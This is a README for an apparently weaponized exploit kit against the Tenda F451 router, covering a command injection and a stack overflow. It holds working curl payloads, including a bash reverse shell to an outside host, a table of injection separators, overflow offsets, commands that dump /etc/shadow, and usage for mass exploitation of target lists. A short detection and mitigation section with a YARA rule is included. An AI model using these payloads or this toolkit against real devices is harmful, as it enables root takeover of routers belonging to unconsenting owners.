# Tenda F451 Multi-CVE Exploit Kit (Upgraded)

**CVE-2026-11556 (WriteFacMac) | CVE-2026-11557 (Stack Overflow Chain)**  
**Military-Grade Multi-Vector RCE Framework for Tenda F451 Router**

![Severity](https://img.shields.io/badge/Severity-Critical-red)
![CVSS](https://img.shields.io/badge/CVSS-9.8-red)
![Status](https://img.shields.io/badge/Status-Weaponized-red)

---

## Overview

The Tenda F451 router contains two critical pre-authentication vulnerabilities that can be chained for reliable remote code execution:

| CVE | Endpoint | Parameter | Type | Method |
|-----|----------|-----------|------|--------|
| **CVE-2026-11556** | `/goform/WriteFacMac` | `mac` | OS Command Injection | POST |
| **CVE-2026-11557** | `/goform/fast_setting_wifi_set` | `wifi_ssid` | Stack Buffer Overflow Chain | POST |

### Exploitation Chain

```
[CVE-2026-11556] Command Injection (reliable, immediate RCE)
         OR
[CVE-2026-11557] Stack Overflow → Memory Corruption → Code Execution
```

Both endpoints accept HTTP POST requests and process input without authentication or CSRF protection.

---

## Technical Details

### CVE-2026-11556: WriteFacMac Command Injection

The `WriteFacMac` handler processes MAC address filtering requests. The `mac` parameter is directly interpolated into a shell command without sanitization.

**Vulnerable Code Pattern:**
```c
#include <stdio.h>
#include <stdlib.h>

// /bin/httpd - WriteFacMac handler (reconstructed pattern, not verbatim firmware code)
int WriteFacMac(webs_t wp) {
    char *input = websGetVar(wp, "mac", "");   // attacker-controlled, never validated
    char cmd[128];
    // INJECTION: the raw value is spliced into a shell command line unquoted
    // (an over-long value also overruns cmd[128], since sprintf is unbounded)
    sprintf(cmd, "iwpriv ra0 set AccessControlList=%s", input);
    system(cmd);   // runs via /bin/sh -c as the httpd user (root)
    return 0;
}
```

**Exploitation:**
```bash
# Direct command execution
curl -X POST http://target/goform/WriteFacMac \
  -d "mac=aa:bb:cc:dd:ee:ff;id"

# Output: uid=0(root) gid=0(root) groups=0(root)

# Reverse shell
curl -X POST http://target/goform/WriteFacMac \
  -d "mac=aa:bb:cc:dd:ee:ff;bash -c 'bash -i >& /dev/tcp/10.0.0.5/4444 0>&1'"
```

### CVE-2026-11557: Stack Overflow Chain

The `fast_setting_wifi_set` handler processes WiFi SSID configuration. The `wifi_ssid` parameter is copied into a fixed-size stack buffer without length bounds checking, leading to a stack-based buffer overflow.

**Vulnerable Code Pattern:**
```c
#include <string.h>

// /bin/httpd - fast_setting_wifi_set handler (reconstructed pattern, not verbatim firmware code)
int fast_setting_wifi_set(webs_t wp) {
    char ssid[256];
    char *input = websGetVar(wp, "wifi_ssid", "");
    // NO BOUNDS CHECK: a value longer than 256 bytes writes past ssid into the frame
    strcpy(ssid, input);
    // Stack layout: ssid[256] + padding + saved $fp + saved $ra
    return 0;
}
```

**Stack Layout:**
```
[    ssid buffer: 256 bytes    ] [ padding: ~768 bytes ] [ saved $fp ] [ saved $ra ] <-- overwrite here
                                                                 ^^^^^^^^^^^^
                                                                 offset: ~1024 bytes
```

---

## Exploitation Vectors

### Vector 1: Command Injection (Most Reliable)

Multiple injection patterns are supported for maximum reliability:

| Pattern | Example | Use Case |
|---------|---------|----------|
| Semicolon | `mac;id` | Basic command separator |
| Double AND | `mac&&id` | Chain commands |
| Pipe | `mac\|id` | Pipe output |
| Backticks | `` mac`id` `` | Command substitution |
| `$()` | `mac$(id)` | Modern command substitution |

### Vector 2: Stack Overflow Chain

For architectures with limited command injection reliability, the stack overflow provides a second exploitation path:

1. **Overflow saved return address** at offset ~1024 bytes
2. **Redirect execution** to ROP chain or shellcode
3. **Achieve code execution** with controlled registers

**The framework includes:**
- Payload builder with configurable offset
- HTTP form encoding for binary payloads
- Custom payload file support

---

## Repository Structure

```
tenda_f451_upgraded/
├── requirements.txt          # Python dependencies
├── scanner.py                # Async scanner with injection detection
├── exploit.py                # Multi-CVE exploitation framework
└── README.md                 # This file
```

---

## Quick Start

### 1. Install Dependencies

```bash
python3.11 -m venv .venv
source .venv/bin/activate
pip install --upgrade pip
pip install -r requirements.txt
```

### 2. Reconnaissance Scan

```bash
# CIDR sweep with command injection detection
python scanner.py -n 192.168.1.0/24 -o scan_results.json

# Single target
python scanner.py -t 192.168.1.50

# Target list
python scanner.py -f targets.txt --threads 200

# Sample output:
# Target: 192.168.1.50
# Status: VULNERABLE (confidence: 88%)
#   >>> CVE-2026-11556 CONFIRMED
#   → http/80: Tenda F451 Web UI
#   → CVE-2026-11556: Command injection confirmed with payloads: ['test;id']
```

### 3. Exploitation

```bash
# Immediate command injection (most reliable)
python exploit.py -t 192.168.1.50 -c "id; cat /etc/passwd; cat /etc/shadow" --cve 11556

# Reverse shell via command injection
python exploit.py -t 192.168.1.50 --reverse --lhost 10.0.0.5 --lport 4444 --cve 11556

# Stack overflow chain
python exploit.py -t 192.168.1.50 --cve 11557 --offset 1024

# Mass exploitation
python exploit.py -f targets.txt --reverse --lhost 10.0.0.5 -o exploit_results.json -w 50

# Custom payload file
python exploit.py -t 192.168.1.50 --cve 11557 --payload-file custom_shellcode.bin
```

---

## Exploit Module API

### Direct Function Calls

```python
from exploit import (
    exploit_cve2026_11556,
    exploit_cve2026_11556_reverse_shell,
    exploit_cve2026_11557,
    run_exploit_chain,
    mass_exploit,
)

# CVE-2026-11556: Command injection
ok, output = exploit_cve2026_11556("192.168.1.50", command="id")
ok, output = exploit_cve2026_11556_reverse_shell("192.168.1.50", "10.0.0.5", 4444)

# CVE-2026-11557: Stack overflow
ok, output = exploit_cve2026_11557("192.168.1.50", command="id")
ok, output = exploit_cve2026_11557("192.168.1.50", offset=1024, payload_file="shellcode.bin")

# Orchestrated chain
sessions = run_exploit_chain("192.168.1.50", cve="all", reverse_shell=True,
                             lhost="10.0.0.5", lport=4444, mac="aa:bb:cc:dd:ee:ff")

# Parallel mass exploitation
results = mass_exploit(["192.168.1.50", "192.168.1.51"], reverse_shell=True,
                       lhost="10.0.0.5", lport=4444)
```

---

## Detection & Mitigation

### Network Indicators

| Indicator | Description |
|-----------|-------------|
| HTTP POST `/goform/WriteFacMac` with `mac` parameter containing `;`, `&&`, `\|` | Command injection attempt |
| HTTP POST `/goform/fast_setting_wifi_set` with `wifi_ssid` > 256 bytes | Overflow attempt |
| Large POST bodies | Potential exploit payloads |

### YARA Rule

```yara
rule Tenda_F451_MultiCVE {
    strings:
        $endpoint1 = "/goform/WriteFacMac" nocase
        $endpoint2 = "/goform/fast_setting_wifi_set" nocase
        $param1 = "mac=" nocase
        $param2 = "wifi_ssid=" nocase
        // a shell metacharacter, raw or percent-encoded, inside the mac value
        // (a plain string of ";|&`$" would only match that exact sequence)
        $injection = /mac=[^&]{0,200}([;|`$]|%3[bB]|%7[cC]|%60|%24|%26)/
    condition:
        ($endpoint1 and $param1 and $injection) or ($endpoint2 and $param2)
}
```

### Mitigations

1. **Immediate**: Disable remote management (WAN access)
2. **Firmware**: Update to latest Tenda release
3. **Network WAF**: Block POST to `/goform/*` from external IPs
4. **IDS/IPS**: Deploy signatures for shell metacharacters in form data
5. **Monitoring**: Alert on `system()` or `popen()` calls from the httpd process

---

## Weaponization Features

| Feature | Implementation |
|---------|----------------|
| **Multi-Vector** | Command injection (reliable) + Stack overflow (precision) |
| **Injection Patterns** | 6 payload formats for maximum reliability |
| **Custom Payloads** | Load from file for advanced exploitation |
| **Offset Configurable** | Support variable overflow offsets |
| **Parallel Mass Exploit** | ThreadPoolExecutor with configurable workers |
| **Session Tracking** | Full metadata on every exploitation attempt |

---

## Legal & Ethics

This toolkit is provided for:
- Authorized penetration testing of infrastructure you own
- CISA/NCC/NCSC-aligned defensive research
- Detection rule development and purple-team exercises
- Red team / bug bounty programmes with explicit written scope

**Unauthorized use against systems you do not own is a criminal offence** under CFAA (US), Computer Misuse Act (UK), GDPR Art. 32 (EU), and equivalent legislation worldwide.

---

## References

| CVE | Description |
|-----|-------------|
| CVE-2026-11556 | Tenda F451 WriteFacMac OS Command Injection |
| CVE-2026-11557 | Tenda F451 fast_setting_wifi_set Stack Buffer Overflow |

---

## Version History

| Version | Date | Changes |
|---------|------|---------|
| 2.0.0 | 2026-06-13 | Complete rewrite: async scanner with injection detection, multi-vector orchestration |
| 1.0.0 | 2026-06-10 | Initial release (basic PoC scripts) |

---

## Author

Advanced Persistent Security Research  
Military-grade exploit engineering for authorized assessment only.